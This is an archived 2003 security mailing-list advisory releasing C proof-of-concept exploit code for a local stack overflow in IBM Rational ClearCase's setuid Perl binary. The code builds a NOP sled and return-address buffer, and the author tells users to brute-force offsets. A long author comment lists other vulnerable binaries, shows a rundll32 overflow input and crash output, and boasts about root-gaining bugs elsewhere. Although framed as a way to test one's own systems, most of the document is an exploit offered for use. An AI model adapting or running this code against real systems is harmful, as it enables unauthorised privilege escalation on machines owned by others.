[EXPL] Rational Clearcase Exploit Code Released
From: SecuriTeam (support_at_securiteam.com)
Date: 09/14/03
- Previous message: SecuriTeam: "[NEWS] MyServer Buffer Overflow Vulnerability (math_sum.mscgi)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 14 Sep 2003 18:33:40 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Rational Clearcase Exploit Code Released
------------------------------------------------------------------------
SUMMARY
<http://www.rational.com/products/clearcase/prodinfo.jsp> IBM Rational
ClearCase "simplifies the process of change with a family of products that
scales from small project workgroups to the distributed global
enterprise". A locally exploitable stack overflow in the product's
binaries allows gaining of elevated privileges. The following exploit code
can be used to test your system for the mentioned vulnerability.
DETAILS
Exploit:
/*
****** Another Proof Of Concept Code by c0ntex@hushmail.com
******
**** Rational Clearcase Clearance ****
**********************
*
-------------------------------------------------------------------------------------
The definition of Rational in the dictionary:
Definition: [adj] having its source in or being guided by the intellect
(distinguished from experience or emotion); "a rational analysis"
[adj] of or associated with or requiring the use of the mind;
"intellectual
problems"; "the triumph of the rational over the animal side of man"
-------------------------------------------------------------------------------------
There are so far, 10 seperate binaries, including the below that
are vulnerable
to some form of stack based attack. All architectures are
vulnerable in some form
too. It is also possible to own remote machines from the ClearCase
binaries.
Is it a bug or a feature? who cares, it's Friday :-)
[-] Vuln Binary [-] Vuln Architectures [-]Serious?
/usr/atria/bin/Perl Intel, Alpha, RISC, Possible SPARC Could be
/usr/atria/bin/notify Intel, Alpha, RISC, Possible SPARC Not
really
/usr/atria/bin/cleartool Intel, Alpha, RISC, Possible SPARC Yeah
/usr/atria/etc/scrubber Intel, Alpha, RISC, Possible SPARC Yeah
/usr/atria/etc/mount_mvfs Intel, Alpha, RISC, Possible SPARC Yeah
/usr/atria/etc/imsglog Intel, Alpha, RISC, Possible SPARC Could be
/usr/atria/etc/Gzip Intel, Alpha, RISC, Possible SPARC Not really
... etc ...
Still to come: ALBD and MVFS / NFS encapsulation analysis. You may find
that MVFS
causes your NFS daemon to, well, react in adverse ways. :) Await a
testing environment.
Anyone?
*******************
BOYCOT ROOT GAINING EXPLOIT CODE SHARING
*******************
ALL linux SetUID binaries have a little bug too :-) RUN Forest,
RUN, you might find
it too *lol* // Funny priv8 joke ahha //
Want another funny priv8 joke?
-> http://www.wired.com/news/infostructure/0,1377,60391,00.html
Symantec are a funny bunch, they want to make exploit and tool codes
illegal.
Ok sirs, may this humble hobbiest ask your good integrity driven self why
you decide
to purchase and fund a security related website that shares these same
codes with the
public socialist. You could perhaps also then answer why you also fund a
security
related website that is involved with people that have been known to
`hack`, where
the word hack is assumed to be in the same context used by the media
monkey.
--
bash> file core.*
core.1230: ELF 32-bit LSB core file of 'su' (signal 11), Intel 80386,
version 1 (SYSV),
from 'su'
core.1233: ELF 32-bit LSB core file of 'crontab' (signal 11), Intel
80386, version 1
(SYSV), from 'crontab'
bash> su
Segmentation fault (core dumped)
bash> mount
mount: error while loading shared libraries: O: cannot open shared object
file: No such
file or directory
bash> PuTTY
-bash: PuTTY: command not found
bash> passwd
Segmentation fault (core dumped)
Still checking this out.
*******************
Oracle, now there is an application, it also has some stack based bug
that can be
abused by underpaid and overworked computer hobbiest, some PoC might be
shared.
Then again, it might not :)
Oracle and SNMP, what a lovely combination.
Oracle on Microsoft system is funny too.
****************
Speaking of Microsoft, another little bug noticed was an overflow in a
widespread
*exe* called rundll32. Only useful for virii or something stupid like
that anyway,
right?
"!!ALERT!! No 0day patch for remote 0day XSS 0day" *LOL*, this is funny
stuff man.
---------
Let us go back about 1 1/2 months.
Background: Being terribly bored with brain numbing talk on IRC I decided
to play a
great game called Counter Strike - have you played this game? I tell you,
it is a
very good game :) come play some time, it is not a buggy application
*HONEST*
You know what I mean right?
"Description: The Windows Rundll32 Program is used to run DLLs as
programs and is
used by many programs to execute functions located in a DLL file."
The part that has been left out: rundll32 has been coded in such a way
that it does
not check user supplied input with a means to preventing user controlled
buffer
overflows.
rundll32.exe
0x4c0x4f0x4c0x4c0x4f0x4c0x4c0x4f0x4c0x4c0x4f0x4c0x4c0x4f0x4c0x4c0x4f0x4c
0x4c0x4f0x4c0x4c0x4f0x4c0x4c0x4f0x4c0x4c0x4f0x4c0x4c0x4f0x4c0x4c0x4f0x4c0x4c0x4f0x4c
0x4c0x4f0x4c0x4c0x4f0x4c0x4c0x4f0x4c0x4c0x4f0x4c0x4c0x4f0x4c0x4c0x4f0x4c0x4c0x4f0x4c
0x4c0x4f0x4c0x4c0x4f0x4c0x4c0x4f0x4c0x4c0x4f0x4c0x4c0x4f0x4c0x4c0x4f0x4c0x4c0x4f0x4c
0x4c0x4f0x4c0x4c0x4f0x4c0x4c0x4f0x4c0x4c0x4f0x4c0x4c0x4f0x4c0x4c0x4f0x4c0x4c0x4f0x4c
0x4c0x4f0x4c0x4c0x4f0x4c :)
Faulting application rundll32.exe, version 5.1.2600.0, faulting module
unknown,
version 0.0.0.0, fault address 0x000a000d.
Unicode EIP address = 00410041 = *LOL*
http://community.core-sdi.com/~juliano/unicodebo.pdf <--// Nice site
fella :) //
You might say `who cares` about rundll32, he say "not he", but would be
rude not to let
you know why windows machines shut down or have new user account.
After finding the bug I check google engine and find one post from a guy
that noticed
the same thing.
Hi guy :-)
-------------------------------------------------------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define VER "ClearCase Smack_Crack_And_Hack_Attack Version 1.0.1"
#define NULL (void *)0
#define NOP 0x90
#define RET 0xbfffd838
#define BUFF 1300
char shellcode[] = "\x31\xc0\xfe\xc0\xcd\x80";
/*
8048091: 31 c0 xor %eax,%eax
8048093: fe c0 inc %al
8048095: cd 80 int $0x80
*/
int main(int argc, char *argv[]) {
char buffer[BUFF];
unsigned long int retaddr;
unsigned short int offset = 0;
unsigned short int i;
if(argc > 1) {
offset = atol(argv[1]);
}
retaddr = RET + offset;
printf("\n\n*************************************************************\n"
"*************************************************************\n");
printf("[-] %s\n", VER);
printf("[-] Bug discovered and PoC developed by
c0ntex@hushmail.com.\n"
"[-]
--------------------------------------------------------\n"
"[-] with a little bit of copy & paste skill. Ok, Yes, it is\n"
"[-] true, c0ntex also lazy perl scripter. :->\n"
"[-]
--------------------------------------------------------\n"
"[-] If the added return address isn't working, brute force
it.\n"
"[-] Values from around -2000 -> +2000 should work quite
well.\n"
"[-] Or add a request to get current esp value and use that.\n"
"[-]
--------------------------------------------------------\n"
"[-] Usage: %s offset_value\n", argv[0]);
for(i = 0; i < BUFF; i += 4)
*(long *) &buffer[i] = retaddr;
for(i = 0; i < (BUFF - strlen(shellcode) - 100); ++i)
*(buffer + i) = NOP;
memcpy(buffer + i, shellcode, strlen(shellcode));
printf("[-] Using Return address 0x%lx\n", retaddr);
printf("[-] Using offset value %d\n", offset);
printf("*************************************************************\n"
"*************************************************************\n\n");
execlp("/usr/atria/bin/Perl", "Perl", buffer, NULL);
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:c0ntex@hushmail.com> c0ntex.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NEWS] MyServer Buffer Overflow Vulnerability (math_sum.mscgi)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [UNIX] Remote Format String Vulnerabilities in eXtremail Server (MAIL FROM, Reappearing)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... to promote the most advanced
vulnerability assessment solutions today. ... int send_sock; ... strncat (buf,
"a", 1); ... (Securiteam) - [EXPL] xMule AttachToAlreadyKnown Double Free Vulnerability Exploit Code
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Remote Vulnerabilities> eMule
/ Lmule / xMule Multiple Remote ... a vulnerability in xMule allows remote attackers
to cause ... int gai_errno = 0; ... (Securiteam) - [NT] SurgeMail 38k4 Format string and Buffer Overflow
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... SurgeMail 38k4 Format string and
Buffer Overflow ... affected by a format string vulnerability in the function which
builds the ... int putcc; ... (Securiteam) - [EXPL] Ethereal EIGRP Dissector Buffer Overflow Exploit
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... for the EIGRP Dissector buffer
overflow is presented below. ... * This vulnerability was found by: ... static
int ... (Securiteam) - [EXPL] Buffer Overflow in JOIN Command Leads to DoS
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... the vulnerability allows
remote attackers to cause to server to no ... int sockopen ... struct hostent
*he; ... (Securiteam)
